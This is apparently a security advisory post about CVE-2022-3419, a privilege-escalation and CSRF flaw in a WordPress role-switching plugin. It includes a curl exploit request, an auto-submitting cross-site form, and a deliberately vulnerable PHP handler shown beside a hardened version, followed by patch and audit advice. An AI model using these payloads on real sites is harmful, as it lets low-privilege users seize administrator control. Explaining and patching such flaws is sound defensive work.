WordPress plugins make running a site easier, but a single plugin with weak security checks can compromise the whole site. That is what happened with the Automatic User Roles Switcher plugin before version 1.1.2, which is affected by a serious vulnerability, CVE-2022-3419. Here is how it works, why it is dangerous, and how to protect your site.
What Is CVE-2022-3419?
CVE-2022-3419 is a vulnerability in the Automatic User Roles Switcher WordPress plugin, versions before 1.1.2. The plugin's role-switching request handler performs neither an authorization (capability) check nor a CSRF check: it never verifies that the caller is allowed to assign roles, and it never verifies a nonce issued to the caller's own session for that action. As a result, any authenticated user, even a plain subscriber, can assign themselves any role, including Administrator. Simply put, someone with barely any rights can take over your whole site.
The missing CSRF check means the same request can also be triggered from a page the attacker controls: the victim's browser attaches the site's login cookie automatically, so the attacker does not even need to send the request from their own session.
In short, a logged-in user only has to send one well-formed request, and they are an administrator.
The Exploit
Below is a simplified example of how a subscriber could exploit the bug. It sends a POST request to the plugin's role-switching endpoint through admin-ajax.php. The action and parameter names used here are illustrative placeholders for the plugin's actual ones; the shape of the request is what matters.
curl -i -s -k -X POST \
  -H 'Cookie: wordpress_logged_in_xxx=subscriber_session_token' \
  --data 'user_id=YOUR_USER_ID&role=administrator' \
  'https://victim-site.com/wp-admin/admin-ajax.php?action=change_user_role'
- Replace YOUR_USER_ID with the attacker's own (subscriber) WordPress user ID, and replace the Cookie header with that subscriber's real wordpress_logged_in_* cookie (the cookie name ends in a hash derived from the site URL). The request must be authenticated: the bug lets a logged-in user escalate, it does not let an anonymous visitor in.
CSRF Example
Because there is no nonce (CSRF) check, an attacker can also host the request on a page they control. When a user who is logged in to the target site visits that page, the browser submits the form automatically with the victim's session cookie attached:
<form method="POST" action="https://victim-site.com/wp-admin/admin-ajax.php?action=change_user_role">
  <input type="hidden" name="user_id" value="3">
  <input type="hidden" name="role" value="administrator">
  <input type="submit" value="Click me!">
</form>
<script>document.forms[0].submit();</script>
The victim does not need to be privileged: because the plugin never checks the caller's capabilities, a subscriber's session is enough for the request to go through, and the account named by user_id (3 in this example; the attacker would put their own ID here) ends up with the Administrator role.
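The following is an added example, not code from the plugin or from this post's author. It shows the shape of the flaw described in the sections above (no authorization check, no nonce check) beside a hardened handler that would defeat both the direct request and the cross-site form. The AJAX hook name change_user_role, the user_id and role fields, and the nonce action name aurs_change_role are assumptions chosen to match the simplified exploit; the WordPress functions used (check_ajax_referer, current_user_can, get_editable_roles, WP_User::set_role, wp_create_nonce) are real core APIs.

```php
<?php
// Added example, not the plugin's own code. The AJAX action name
// 'change_user_role', the POST fields 'user_id' and 'role', and the nonce
// action 'aurs_change_role' are assumptions for illustration.

// BEFORE: the shape of the flaw behind CVE-2022-3419. A wp_ajax_* hook only
// requires a logged-in user, so a subscriber reaches this handler. Nothing
// checks what the caller is allowed to do, and nothing ties the request to a
// nonce, so a form on another site can submit it with the victim's cookie.
function vulnerable_change_user_role() {
    $user_id = isset( $_POST['user_id'] ) ? (int) $_POST['user_id'] : 0;
    $role    = isset( $_POST['role'] ) ? sanitize_key( $_POST['role'] ) : '';

    $user = get_userdata( $user_id );
    if ( ! $user || '' === $role ) {
        wp_send_json_error( 'bad request', 400 );
    }
    $user->set_role( $role ); // subscriber -> administrator in one request
    wp_send_json_success();
}
// add_action( 'wp_ajax_change_user_role', 'vulnerable_change_user_role' );

// AFTER: the two checks the advisory says were missing, plus a role allow-list.
function hardened_change_user_role() {
    // 1. CSRF: the request must carry a nonce minted for this action and this
    //    user's session. check_ajax_referer() terminates the request with "-1"
    //    if the '_wpnonce' field is absent, expired, or issued to someone else.
    check_ajax_referer( 'aurs_change_role', '_wpnonce' );

    $user_id = isset( $_POST['user_id'] ) ? (int) $_POST['user_id'] : 0;
    $role    = isset( $_POST['role'] ) ? sanitize_key( $_POST['role'] ) : '';

    // 2. Authorization: the caller needs the capability to promote users and
    //    to edit this particular user (the same checks core's edit_user() makes).
    //    A subscriber has neither, so self-promotion stops here.
    if ( ! current_user_can( 'promote_users' ) || ! current_user_can( 'edit_user', $user_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Only assign roles the caller could assign from the Users screen.
    //    get_editable_roles() lives in wp-admin/includes/user.php, which
    //    admin-ajax.php loads, and it honours the editable_roles filter.
    $editable = get_editable_roles();
    if ( '' === $role || ! isset( $editable[ $role ] ) ) {
        wp_send_json_error( 'role not allowed', 400 );
    }

    $user = get_userdata( $user_id );
    if ( ! $user ) {
        wp_send_json_error( 'no such user', 404 );
    }
    $user->set_role( $role );
    wp_send_json_success( array( 'user_id' => $user_id, 'role' => $role ) );
}
// add_action( 'wp_ajax_change_user_role', 'hardened_change_user_role' );

// The legitimate client must include the nonce in its POST body. Minting it in
// the page that renders the role switcher (for example via wp_localize_script())
// is what makes the cross-site form above fail: the attacker's page cannot
// obtain a nonce bound to the victim's session.
function hardened_change_user_role_nonce() {
    return wp_create_nonce( 'aurs_change_role' );
}
```

With the hardened handler, the curl request from a subscriber fails the capability check with a 403, and the cross-site form fails the nonce check before any parameter is even read. The nonce alone would not have been enough: without the capability check, a subscriber could still obtain a valid nonce from a page they are allowed to view and promote themselves.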
Who’s at Risk?
Any WordPress site running Automatic User Roles Switcher version 1.1.1 or earlier is vulnerable. Check the installed version on the Plugins screen, or with wp plugin list if you use WP-CLI.
Why Is This So Dangerous?
- Privilege Escalation: any subscriber-level account (for example a self-registered one, if registration is open) can become an administrator, install backdoors, modify or delete content, and take over the entire site.
- No privileged victim required: the escalation does not depend on tricking an administrator. The missing CSRF check only widens the attack surface further.
Immediate actions you MUST take
1. Update the Plugin: Upgrade to version 1.1.2 or higher.
2. Disable/Remove If Not Used: If you don't need this plugin, it is safer to delete it.
3. Review Administrator Accounts: Because the escalation leaves no trace beyond a changed role, check the Users screen for administrators you do not recognise, demote or remove them, and rotate credentials if you find one.
References & Further Reading
- NVD CVE-2022-3419 Detail
- WPScan Report
- Automatic User Roles Switcher Plugin
- MITRE CVE Record
Final Thoughts
Vulnerabilities like CVE-2022-3419 show why it’s so important to keep your WordPress plugins updated and to use only trustworthy extensions. A small plugin can open the door to big problems. Always audit your plugins, follow security news, and lock down user permissions on your site.
Timeline
Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 15:49:00 UTC